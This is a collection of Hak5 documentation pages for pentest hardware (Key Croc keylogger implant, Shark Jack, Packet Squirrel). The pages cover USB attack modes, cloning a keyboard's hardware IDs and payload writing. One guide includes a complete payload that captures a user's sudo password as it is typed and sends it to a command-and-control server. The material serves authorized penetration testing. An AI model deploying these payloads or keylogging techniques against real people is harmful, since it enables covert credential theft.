RNDIS\_ETHERNET [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#rndis_ethernet)
---------------------------------------------------------------------------------------------------------------------------------
RNDIS – Remote Network Driver Interface Specification. In this attack mode, the Key Croc will emulate a USB Ethernet adapter for Windows targets. Some Linux targets are known to support this microsoft-proprietary standard.
### OPTIONS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#options)
`RNDIS_SPEED_XX`
Sets the reported RNDIS speed to XX (where 0 < XX <= 4294967) in kilobytes.
### **EXAMPLES** [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#examples)
`ATTACKMODE RNDIS_ETHERNET RNDIS_SPEED_2000000`
Emulates an RNDIS Ethernet adapter with a speed of 2Gbps
`ATTACKMODE RNDIS_ETHERNET RNDIS_SPEED_10000`
Emulates an RNDIS Ethernet adapter with a speed to 10Mbps. This may prevent Windows targets from recognizing the Key Croc as the default gateway since it is likely that a network interface with a higher metric (typically faster speed) already exists.
AUTO\_ETHERNET [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#auto_ethernet)
-------------------------------------------------------------------------------------------------------------------------------
This attack mode will first attempt to bring up `ECM_ETHERNET`. If after the default timeout of 20 seconds no connection is established, `RNDIS_ETHERNET` will be attempted.
### OPTIONS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#options-1)
The timeout can be specified with the `ETHERNET_TIMEOUT_XX` parameter. Replace XX with a number of seconds.
### EXAMPLE [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#example)
`ATTACKMODE ECM_ETHERNET ETHERNET_TIMEOUT_30`
HID [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#hid)
----------------------------------------------------------------------------------------------------------
HID – Human Interface Device. This is the attack mode which emulates a keyboard, and enables keyboard passthrough, key logging and keystroke injection via Ducky Script 2.0.
Without this attack mode, the Key Croc will not pass through keyboard input to the target.
The `VID` and `PID` values of the connected keyboard are automatically cloned for this particular attack mode, as described in the section on Hardware ID Cloning. This may be overridden by specifying a VID and PID value in the [config.txt](https://docs.hak5.org/key-croc/docs/configuration/)
.
STORAGE [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#storage)
------------------------------------------------------------------------------------------------------------------
UMS – USB Mass Storage. This attack mode emulates a standard flash drive, with the Key Croc presenting its udisk partition to the target as a USB mass storage device.
See the section on understanding the key croc file system for important notes on using this attack mode.
RO\_STORAGE [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#ro_storage)
-------------------------------------------------------------------------------------------------------------------------
Similar to the STORAGE option, the RO\_STORAGE attack mode presents the Key Croc udisk partition as a USB mass storage device – however in this case the emulated devices file system will be read only.
SERIAL [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#serial)
----------------------------------------------------------------------------------------------------------------
ACM – Abstract Control Model. This attack mode emulates a serial console. Connecting to the serial device from the target, the user will be presented with the Key Croc bash shell. See the Serial Console section for more information on access from your target computer.
OFF [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#off)
----------------------------------------------------------------------------------------------------------
Disables the USB interface until ATTACKMODE is executed again. In this mode, the target will not identify the Key Croc as being connected.
* * *
[_navigate\_before_ Installing Extras Like Metasploit](https://docs.hak5.org/key-croc/tips-and-tricks/installing-extras-like-metasploit/)
[Hardware Id Cloning _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/hardware-id-cloning/)
---
# Password Sniffing With The Key Croc Easy Or Super Easy | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Password Sniffing With The Key Croc Easy Or Super Easy
======================================================
Let’s face it, credentials woo clients on pentest engagements. Whether cracked password hashes or private SSH keys, these strings of would-be secret characters are golden tickets at the debrief. Now, with the [Key Croc](https://shop.hak5.org/products/key-croc)
, snagging credz has gone from easy to super-easy.
Even in an era with single sign-on and password managers, a recent [usenix study](https://www.usenix.org/system/files/conference/soups2016/soups2016-paper-mare.pdf)
found that the average person types some 23 passwords a day. Even better for the pentester if that’s a master password! So let’s find out how to dig out the needles in a haystack of logged keystrokes.

A GREAT PAYLOAD BEGINS WITH A GREAT MATCH [_link_](https://docs.hak5.org/key-croc/beginner-guides/password-sniffing-with-the-key-croc-easy-or-super-easy/#a-great-payload-begins-with-a-great-match)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The most powerful [Ducky Script](https://docs.hak5.org/hc/en-us/categories/360004054433-Ducky-Script)
command for the Key Croc is `MATCH`. Quite simply, whenever the user types something that matches this parameter, the payload gets triggered. That can be as simple as a string like “password” or as complex as a regular expression to weed out email addresses.
Let’s imagine we want true pentest gold; root passwords. Picture this, an engineers workstation - from devops to QA. Like you, the pentester, from time to time throughout the day - root is required. Whether an apt update or moving certain files, sudo provides a convenient means to temporarily DO something as the Super User. So for our example, let’s keep it simple and `MATCH` on the string “`sudo`”
> `MATCH sudo`
>
THE GOOD STUFF GETS LOGGED WITH SAVEKEYS [_link_](https://docs.hak5.org/key-croc/beginner-guides/password-sniffing-with-the-key-croc-easy-or-super-easy/#the-good-stuff-gets-logged-with-savekeys)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The second most powerful Ducky Script command for the Key Croc is `SAVEKEYS`. Triggered directly after a `MATCH` statement atop a payload, this command conveniently saves just the keystrokes you care about. This can be a number of keys typed before the `MATCH` was triggered with the `LAST` argument, a number of keys typed after the `MATCH` with the `NEXT` argument, or – as introduced in Key Croc v1.3 – a number of keys `UNTIL` a string or regular expression is matched.
`SAVEKEYS UNTIL` makes it even easier to get just the goods we want. `SAVEKEYS UNTIL`, much like `MATCH`, lets you specify a simple string or complex regular expression - and like the name implies it will save the keys typed until there’s a match. Using this logic, and building on our sudo password grabbing payload, let’s do the following:
> `SAVEKEYS /root/loot/password.txt UNTIL \[ENTER\](.*?)\[ENTER\]`
>
This little regular expression says, basically, save the keys until the `ENTER` key is pressed twice – and we don’t care what’s typed in between them. We know that the first `ENTER` key is going to be at the end of the sudo command. Next, the password is typed when prompted - hence the `(.*?)` regular expression for anything, until finally our last statement is the final `ENTER` key - confirming the password. Note the backslashes to escape the special characters, as keys like `ENTER`, `TAB`, `DELETE` and the like are surrounded by brackets in Key Croc-land.
This will generate the specified password.txt file in our loot directory once the second `ENTER` key is pressed after typing “`sudo`”. Great - our password is now so much easier to find, and we can both immediately exfiltrate just this file as well as get an alert right in our [Cloud C2](https://c2.hak5.org/)
dashboard using the `C2EXFIL` and `C2NOTIFY` commands. The password.txt will probably look like:
> `apt update[ENTER]lamepassword[ENTER]other stuff we probably don't care about`
>
What’s more, when using the `SAVEKEYS UNTIL` option, both the specified file (`password.txt` in this case) as well as a filtered version are saved (e.g. password.txt.filtered). The filtered version strips out any special key, such as `[ENTER]`, `[TAB]`, `[CONTROL]` and so on. While not necessarily helpful in this particular use case - since we’re using `[ENTER]` as way to determine the privilege escalated command and the password - this is great to note for more simple password snagging payloads, like one with a `MATCH` like `\[CONTROL-ALT-DELETE\]`.
So as you might imagine, with just a little work we can flex our bash-fu to extract this gold systematically, which might be used by a staged payload down the line.
> `awk -F '\[ENTER\]' {'print $2'} /root/loot/password.txt`
>
And there you have it. This little gem will use `[ENTER]` as the delimiter and print the gold typed between the two `ENTER` key presses. As you might imagine, using the power of bash this could be saved to a file and exfiltrated to [Cloud C2](https://c2.hak5.org/)
, or stored in a variable for even more mischief.\\
PUTTING IT ALL TOGETHER [_link_](https://docs.hak5.org/key-croc/beginner-guides/password-sniffing-with-the-key-croc-easy-or-super-easy/#putting-it-all-together)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
While we could end our payload after the first two commands, `MATCH` and `SAVEKEYS`, the real fun happens when we’ve nabbed creds. So, we’ll wrap this example up with some Cloud C2 goodness and save these
> `MATCH sudo SAVEKEYS /root/loot/password.txt UNTIL \[ENTER\](.*?)\[ENTER\] WAIT_FOR_LOOT /root/loot/password.txt awk -F '\[ENTER\]' {'print $2'} /root/loot/password.txt > /root/loot/password-extracted.txt C2EXFIL STRING /root/loot/password-extracted.txt C2NOTIFY INFO 'Captured Root Password'`
>
In this case, the `WAIT_FOR_LOOT` command tells the payload to hold on until the specified loot file has been written. Once it has, we’ll use that awk-fu to create a new file containing just the extracted password, then send it up to Cloud C2 with a notification. Easy as that!
Next, using a staged payload, we could take advantage of these credentials to systematically attack the target. The sky’s the limit!
* * *
[_navigate\_before_ New Features In Key Croc 1.3](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/)
[Configuration Options _navigate\_next_](https://docs.hak5.org/key-croc/configuration/configuration-options/)
---
# Upgrading Firmware | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Upgrading Firmware
==================
From time to time the Packet Squirrel may be updated with new firmware to add features and security improvements. It is highly recommended that you keep your Packet Squirrel up to date with the latest firmware, available from the [Hak5 Download Center](https://downloads.hak5.org/)
.
To install the latest firmware:
1. Download the upgrade file. Make sure that the filename is upgrade-version.bin (where version is the firmware version, e.g. 1.2) and [check that the SHA-256 sum matches](https://docs.hak5.org/hc/en-us/articles/360049922674)
.
2. Copy the upgrade file to the root of an NTFS or EXT4 formatted USB flash drive. Do not rename, unpack or otherwise alter this file.
3. Plug the USB drive into the powered-off Packet Squirrel
4. Flip the Packet Squirrel payload select switch to Arming mode (far right, closest to the USB flash drive)
5. Power on the Packet Squirrel from a reliable USB power source. This process takes 5-10 minutes and will be indicated by a series of LED lights.
report
Do not power-off or otherwise interrupt the device until the flashing process completes.
During the firmware flashing process, the LED will indicate the following states:
1. Green flashing – booting up
2. Red/Blue alternating – beginning firmware flash
3. Solid Red or Blue – firmware flash in progress
4. Green flashing – rebooting
5. Blue flashing – upgrade complete, arming mode ready
* * *
[_navigate\_before_ Getting The Packet Squirrel Online](https://docs.hak5.org/packet-squirrel/internet-connectivity/getting-the-packet-squirrel-online/)
[Manual Upgrade _navigate\_next_](https://docs.hak5.org/packet-squirrel/software-updates/manual-upgrade/)
---
# Hardware Id Cloning | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Hardware Id Cloning
===================
USB devices identify themselves by combinations of unique identifiers, including a vendor ID (VID) and product ID (PID). These 16-bit IDs are specified in hex and are used by the target computer to find drivers (if necessary) for the specified device.
info
By default the Key Croc will automatically clone the identifiers of the connected keyboard.
These identifiers are saved to /tmp/ and may be used in your payloads. This may be overridden by specifying values in the [config.txt](https://docs.hak5.org/key-croc/docs/configuration/)
.
`ATTACKMODE` accepts `VID` and `PID` parameters, in addition to `SERIAL` (Serial Number), `MAN` (Manufacturer) and `PROD` (Product)
ATTACKMODE OPTIONS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/hardware-id-cloning/#attackmode-options)
--------------------------------------------------------------------------------------------------------------------------------------------
`VID_XX` – Vendor ID
`PID_XX` – Product ID
`MAN_XX` – Manufacturer
`SERIAL_XX` – Serial Number
`PROD_XX` – Product
### EXAMPLE [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/hardware-id-cloning/#example)
`ATTACKMODE STORAGE HID VID_0X0A5C PID_0X3025 MAN_LITE-ON SN_0 PROD_Keyboard`
Emulates both a keyboard and usb flash disk with the identifiers of an IBM Corp. NetVista Full Width Keyboard
CURRENT MODE [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/hardware-id-cloning/#current-mode)
--------------------------------------------------------------------------------------------------------------------------------
When the Attack Mode changes, it is written to the `/tmp/mode` file. This may be queried in a payload in order to know which attack mode the device is currently operating. It may be useful to obtain `VID` and `PID` values from this file, or from `/tmp/vidpid`, in order to maintain the same device identifier when changing attack modes.
### EXAMPLE [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/hardware-id-cloning/#example-1)
By default the Key Croc will boot into an attack mode with the `HID` option enabled, and the `VID` and `PID` values obtained from the connected keyboard. If a payload were to then enable the `ECM_ETHERNET` option in addition to the `HID` option, the following code may be used:
`VENDOR=$(cat /tmp/vidpid | cut -d: -f1) PRODUCT=$(cat /tmp/vidpid | cut -d: -f2) ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT`
As another example, in the case that the `/tmp/mode` file contained like the following:
`HID VID_0X062A PID_0X4101`
One may issue a single command to add the `ECM_ETHERNET` option to an existing mode:
`ATTACKMODE ECM_ETHERNET $(cat /tmp/mode)`
* * *
[_navigate\_before_ USB Identifiers](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/)
[Interactive Payload Development _navigate\_next_](https://docs.hak5.org/key-croc/tips-and-tricks/interactive-payload-development/)
---
# Payload Development | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Payload Development
===================
Key Croc payloads are easy to write with Ducky Script. They can be written in any standard text editor. From notepad on Windows to TextEdit on a Mac – even nano on Linux, the best text editor ever. These simple ascii files are processed by the Key Croc’s payload framework. Payloads execute when the target types specified patterns of keystrokes. A payload can be as simple as saving keystrokes of interest, to an advanced array of attacks using multiple device emulation modes, complex pentest frameworks and specialized exploits.
Multiple payloads, each with a unique file name, may be loaded simultaneously from the Key Croc’s udisk payloads folder.
In addition to Ducky Script, the Key Croc payloads are executed with bash. which means they can leverage this powerful shell scripting language. For example, conditional statements can be used to construct decision trees based on events, and text processing tools can be used to systematically extract typed key sequences of interest – storing them in variables for use later in the payload.
Payloads can take advantage of a number of Key Croc commands, in addition to the standard Linux tools, additional pre-installed tools like nmap and smbclient, or the optionally installed tools like metasploit, responder and impacket.
Payload Primer [_link_](https://docs.hak5.org/key-croc/writing-payloads/payload-development/#payload-primer)
-------------------------------------------------------------------------------------------------------------
While the Key Croc may act as an ordinary passive keylogger, silently recording keystrokes to log files or streaming them in real time over the Internet to a Cloud C2 server – it’s strength as a pentest implant lies in its payload capabilities.
Payloads may perform a number of functions, from automated keystroke analysis to notifying the pentester of a matching key sequence to performing advanced active attacks against the target by emulating multiple trusted USB devices.
Similar to the Bash Bunny, the Key Croc payload framework builds on the versatility of Bash, while providing simple helpers as part of the Key Croc language to facilitate basic functions. These functions include pattern-matching for payload execution, saving keys before and after the pattern is matched, injecting keystrokes into the target, emulating additional USB devices like Ethernet, serial and USB mass storage, and controlling the multi-color LED.
The section on Payload Development in this documentation includes a comprehensive guide to these functions, as well as best practices and tips for writing, testing and publishing payloads.
Getting Payloads [_link_](https://docs.hak5.org/key-croc/writing-payloads/payload-development/#getting-payloads)
-----------------------------------------------------------------------------------------------------------------
Example payloads illustrating some of the functionality of the Key Croc can be found from the library directory on the udisk.
Additionally, Hak5 hosts a forum and software repository home to many community contributed payloads which may be downloaded for your convenience from [https://github.com/hak5/keycroc-payloads](https://github.com/hak5/keycroc-payloads)
Loot [_link_](https://docs.hak5.org/key-croc/writing-payloads/payload-development/#loot)
-----------------------------------------------------------------------------------------
In classic Hak5 fashion, the recorded keystrokes and other log files saved on the Key Croc can be found in the loot directory on the udisk. Payloads may save additional logs and other data to this loot directory. The Key Croc keylogging system saves two files by default:
* `croc_raw.log` – these are the recorded keystrokes in scan code format
* `croc_char.log` – these are the recorded keystrokes in a human readable format derived from keymap language file specified by `DUCKY_LANG` in `config.txt`
Additionally, the payload framework will save a log entry to a matches.log file every time a payload is executed by a pattern match.
Technical note: While in Attack Mode, logs and optionally other data from additional payloads are written to /root/loot. When entering Arming Mode, the contents of `/root/loot` are synchronized with the loot directory on the USB Flash Disk at `/root/udisk/loot`. See the guide on Understanding the Key Croc file system for more technical details on this special consideration.
\\
Managing Payloads [_link_](https://docs.hak5.org/key-croc/writing-payloads/payload-development/#managing-payloads)
-------------------------------------------------------------------------------------------------------------------
### Enabling payloads [_link_](https://docs.hak5.org/key-croc/writing-payloads/payload-development/#enabling-payloads)
Payload files, named with either .txt or .sh file extensions, will be activated if they reside in the payloads directory on the udisk. Simply put, copying an example payload file from the library folder to the payload folder will activate the payload the next time the Key Croc is booted (or if the `RELOAD_PAYLOADS` command is run).
Payloads may also be activated by using the `ENABLE_PAYLOAD` command.
### Disabling payloads [_link_](https://docs.hak5.org/key-croc/writing-payloads/payload-development/#disabling-payloads)
Similar to activation, a payload may be deactivated by moving it from the payloads directory on the udisk.
Additionally, if a payload contains “`DISABLED`.” at the beginning of its file name, it will not be executed when its `MATCH` is detected.
Payloads may also be deactivated by using the `DISABLE_PAYLOAD` command.
* * *
[_navigate\_before_ Understanding Languages](https://docs.hak5.org/key-croc/configuration/understanding-languages/)
[Ducky Script Commands _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/ducky-script-commands/)
---
# Files And Directory Structure | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Files And Directory Structure
=============================
UDISK [_link_](https://docs.hak5.org/key-croc/files-and-directory-structure/files-and-directory-structure/#udisk)
------------------------------------------------------------------------------------------------------------------
* config.txt – configuration file
* upgrade.html – shortcut to software update documentation
* version.txt – current version
* docs/ – license and quick start guide
* languages/ – hosts keymap files used for recording and injection
* library/ – hosts inactive payloads
* loot/ – hosts captured keystrokes and other logs
* payloads/ – hosts active payloads
* tools/ – used to install additional packages
* * *
[_navigate\_before_ The LED Command](https://docs.hak5.org/key-croc/writing-payloads/the-led-command/)
[Understanding The File System _navigate\_next_](https://docs.hak5.org/key-croc/files-and-directory-structure/understanding-the-file-system/)
---
# Interactive Payload Development | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Interactive Payload Development
===============================
Sometimes the quickest way to rapidly develop a payload is to write it interactively on the device. This saves time entering arming mode, editing the payload file on the “KeyCroc” USB Flash Disk, safely ejecting the drive, unplugging and replugging the KeyCroc from the host, then finally typing the matching pattern on the attached keyboard.
This can be achieved with an SSH connection, either directly from a local network by adding the `SSH ENABLE` option to `config.txt`, or from the Terminal in Cloud C2. See the guides on Getting the Key Croc Online and Configuring Cloud C2 from the Getting Started section.
If taking the SSH connection from a local network route, you may find the example\_crocctl-ipinfo payload from the included library helpful. With it, typing “`__crocctl-ipinfo`” will cause the Key Croc to type out it’s IP address - saving you time checking DHCP logs or scanning the network.
It is best to have two different physical computers – a dev box and a target box – for interactive development. From the Key Croc shell on the dev box, either by SSH or Cloud C2 Terminal, you can issue commands directly. For example, typing “`QUACK STRING hello world`” into the Bash prompt will inject the “hello world” keystrokes on the target.
RELOAD\_PAYLOADS [_link_](https://docs.hak5.org/key-croc/tips-and-tricks/interactive-payload-development/#reload_payloads)
---------------------------------------------------------------------------------------------------------------------------
Payload files may be edited directly from `/root/udisk/payloads/` using a text editor like nano or vim. You may find a cached copy of payloads on the primary partition. Do not edit these. Doing so may cause unexpected results as they relate to `MATCH` handling. For this reason, you are advised to only edit the payloads from `/root/udisk/payloads/`.
It is important to note the special udisk considerations when interactively writing a payload which utilizes the `ATTACKMODE STORAGE` option. See the guide on Understanding the Key Croc file system for more information.
When editing payload files on the Key Croc interactively, they must be reloaded in order for changes to take effect. To do so, issue the “`RELOAD_PAYLOADS`” command.
CHECK\_PAYLOADS [_link_](https://docs.hak5.org/key-croc/tips-and-tricks/interactive-payload-development/#check_payloads)
-------------------------------------------------------------------------------------------------------------------------
While developing payloads interactively, it may be useful to check payloads for potential `MATCH` and `SAVEKEYS` syntax issues. Running the “`CHECK_PAYLOADS`” command will report the possible pattern matches and corresponding payloads.
* * *
[_navigate\_before_ Hardware Id Cloning](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/hardware-id-cloning/)
[Helpful Payload Snippets _navigate\_next_](https://docs.hak5.org/key-croc/tips-and-tricks/helpful-payload-snippets/)
---
# Shark Jack Basics | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Shark Jack Basics
=================
The Shark Jack is a portable network attack and automation tool for pentesters and systems administrators designed to enable social engineering engagements and opportunistic wired network auditing. It features a familiar Hak5 payload architecture, flip-of-the-switch operation and multi-color LED for instant feedback.
This documentation serves both cable and battery variants of the Shack Jack with notable differences highlighted.
VARIANTS [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#variants)
------------------------------------------------------------------------------------------------
### Shark Jack [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#shark-jack)
The original Shark Jack is a battery powered device with a 10–15 minute runtime and feedback via RGB LED. It’s as comfortable on the keychain as it is in your EDC.

}}
### Shark Jack Cable [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#shark-jack-cable)
The Shark Jack Cable is a USB-C powered pentest companion with continuous runtime and feedback via RGB LED and an interactive serial console. It can be planted for long-term headless deployments or run temporarily from a battery source. This can include the operators USB-C powered smartphone ¹, which may enable shell access via serial using a third party app ².
* ¹ smartphone compatibility may vary. Tested with 2021-era flagship Android devices.
* ² serial access on Android tested using the third party [Serial USB Terminal](https://play.google.com/store/apps/details?id=de.kai_morich.serial_usb_terminal)
app.

}}
### Shark Jack Cable Android Serial Setup [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#shark-jack-cable-android-serial-setup)
Recommended apps: [Hacker’s Keyboard](https://play.google.com/store/apps/details?id=org.pocketworkstation.pckeyboard\\&hl=en_US\\&gl=US)
, [Serial USB Terminal](https://play.google.com/store/apps/details?id=de.kai_morich.serial_usb_terminal\\&hl=en_US\\&gl=US)
.
DEPLOYMENT [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#deployment)
----------------------------------------------------------------------------------------------------
The Shark Jack is meant to be deployed against a target network for brief reconnaissance, exfiltration and IT automation tasks. With a fully charged battery, the Shark Jack will operate for about 10-15 minutes. The Shark Jack Cable may run for as long as a standard USB-C power source is available.
Out-of-the-box, a pre-installed default payload executes an nmap scan of the connected target network when the switch is in the attack mode. This default payload saves the scan results to a loot directory on the device.
This loot may be recovered from SSH access when the switch is in the arming mode. Further, with the switch in arming mode the default payload may be replaced with your own payloads, written in bash, or payloads downloaded from the community repository at [https://github.com/hak5/shark-payloads](https://github.com/hak5/shark-payloads)
info
The Shark Jack Cable provides real time access to loot and the ability to download and activate payloads over-the-air by an interactive serial shell.
CHARGING [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#charging)
------------------------------------------------------------------------------------------------
The Shark Jack features a non-removable lithium ion battery. Please read all instructions before use and familiarize yourself with the important safety information and warnings.
To charge the Shark Jack, flip the switch to the OFF / Charging position. Plug the Shark Jack into a standard USB power source using a USB-C cable. After a brief boot period, indicated by a flashing green LED, the Shark Jack will begin charging.
When the device is charging, the LED will blink blue. When the device is full charged, the LED will light solid blue - at which time the device should be disconnected from USB power. Do not overcharge, and do not leave unattended while charging.
info
The Shark Jack cable does not feature an internal battery and does not require charging. The switch positions are the same for both Shark Jack and Shark Jack Cable.
MODES OF OPERATION [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#modes-of-operation)
--------------------------------------------------------------------------------------------------------------------
Similar to many Hak5 tools, the Shark Jack features an Arming mode and an Attack mode. In Arming mode, the Shark Jack is accessible from SSH for payload loading and configuration. In Attack mode, the selected payload is executed.

}}
### ATTACK MODE [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#attack-mode)
In attack mode, the Shark Jack will execute the `payload.sh` or `payload.txt` bash script from `/root/payload`. Most payloads specify a network mode, setting the Shark Jack as a client with `NETMODE DHCP_CLIENT` or a server with `NETMODE DHCP_SERVER`.
### ARMING MODE [_link_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/#arming-mode)
In arming mode, the Shark Jack will be configured with a static IP address of `172.16.24.1` and will start an SSH server.
With the Shark Jack in arming mode, you may access the embedded linux system via SSH. Connect the Shark Jack to your computer’s Ethernet interface, specify a static IP address in the 172.16.24.0/24 range for this interface (for example `172.16.24.2`) then establish an SSH connection to the Shark Jack at `172.16.24.1` (e.g. with the command “`ssh root@172.16.24.1`”)
info
The Shark Jack Cable provides access to the shell in arming mode via its dedicated serial console. When connected, press `ENTER` to activate the shell and run `HELP` for a list of payload and firmware management commands.
* * *
[_navigate\_before_ Shark Jack by Hak5](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/)
[Default Settings _navigate\_next_](https://docs.hak5.org/shark-jack/getting-started/default-settings/)
---
# Using Sharkjack.sh | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Using Sharkjack.sh
==================
* * *
description: >- This article describes managing payloads and loot with the desktop sharkjack.sh utility. [_link_](https://docs.hak5.org/shark-jack/beginner-guides/using-sharkjack.sh/#sharkjacksh-utility)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
So you’ve gotten the [basics down](https://shop.hak5.org/blogs/shark-jack/unboxing-and-setting-up-the-hak5-shark-jack)
, tried out a few [payloads](https://payloads.hak5.org/)
, and now you’re ready to take your [Shark Jack](https://shop.hak5.org/products/shark-jack)
game to the next level. One thing you may have noticed in getting your feet wet is the task of copying payloads to, and loot from the device. What’s a hacker to do when something is done more than once? Script it, obviously. Enter: [sharkjack.sh](https://downloads.hak5.org/shark)
- now available for MacOS and Linux.
info
Shark Jack Cable users may consider using the built-in commands, as described by running `HELP`, while connected to the Shark Jack in Arming Mode via Serial rather than the desktop sharkjack.sh utility.

}}
The sharkjack.sh script is a pretty front-end that’ll assist it not only loading payloads and getting loot off the Shark Jack, but it’ll help you setup SSH keys so you can connect quickly - potentially without having to type a password. Further, it’ll check to see if your Shark Jack is up to date, and if not it can upgrade the firmware on your device automatically.
Let’s get started. Begin by downloading `sharkjack.sh` from the tools section of [downloads.hak5.org/shark](https://downloads.hak5.org/shark)
. Then, open a terminal and navigate to the directory where you’re keeping `sharkjack.sh`. I like to keep my scripts in my home directory, or `~`, so I can quickly get to ’em by typing ‘`cd`’ and hitting enter. Next, make the script executable with ‘`chmod +x ./sharkjack.sh`’ and run it as root with ‘`sudo ./sharkjack.sh`’
From the `sharkjack.sh` main menu, pressing C will connect via SSH to the Shark Jack. It’ll wait for you to flip the devices switch to arming mode (center position) and plug it into your computer’s Ethernet port. After authenticating with the Shark Jack, you’ll have a ‘`root@shark:~#`’ prompt.
If you want to make logging in even easier, pressing `S` a the main menu will copy your SSH public key to the Shark Jack - and if you haven’t created SSH keys before, it’ll guide you through the process.
The other functions – like upgrading the firmware, pushing payloads to the device, and getting loot saved on its disk work similarly.
So that’s how to easily manage your Shark Jack using the sharkjack.sh helper script. We’d love to hear your thoughts on it in the [forums](https://forums.hak5.org/forum/101-shark-jack/)
, and you’re welcome to contribute from the [github repository](https://github.com/hak5/sharkjack-payloads/blob/master/sharkjack.sh)
. Cheers!
* * *
[_navigate\_before_ Unboxing And Setup](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/)
[Two Key Commands _navigate\_next_](https://docs.hak5.org/shark-jack/beginner-guides/two-key-commands/)
---
# The QUACK Command | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The QUACK Command
=================
The Key Croc introduces enhancements to the Ducky Script keystroke injection command set – known as Ducky Script 2.0. This version builds on the ubiquitous language for keystroke injection that debuted with the [USB Rubber Ducky](https://hak5.org/products/usb-rubber-ducky-deluxe)
and was further enhanced with the [Bash Bunny](https://hak5.org/products/bash-bunny)
.
The following are the basic “`QUACK`” commands – named in honor of the Rubber Ducky that invented the keystroke injection attack.
In order to use Ducky Script 2.0, or `QUACK`, in a payload the attack mode must contain the `HID` option. This is the default attack mode on boot. See the [ATTACKMODE](https://docs.hak5.org/key-croc/docs/writing-payloads/the-attackmode-command/)
section for information on additional attack mode options.
DUCKY\_LANG [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#ducky_lang)
----------------------------------------------------------------------------------------------------
Specified in the config.txt file on the root of the udisk partition (`/root/udisk`) – the `DUCKY_LANG` option configures the keyboard layout to be used in keystroke injection attacks. This is important to note as different computers and keyboards use different layouts around the world.
By default `DUCKY_LANG` is set to the US. Additional keyboard layouts are available from the languages directory on the Key Croc’s USB Flash Disk (udisk). Language key maps are specified using the two letter country code.
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#example)
`DUCKY_LANG DE`
Q [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#q)
---------------------------------------------------------------------------------
`Q` is an alias for `QUACK` that may be used as shorthand substitution anywhere that QUACK may be used. `Q` does not have any further meaning and is otherwise not very impressive.
QUACK [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#quack-key-name)
-------------------------------------------------------------------------------------------------------------
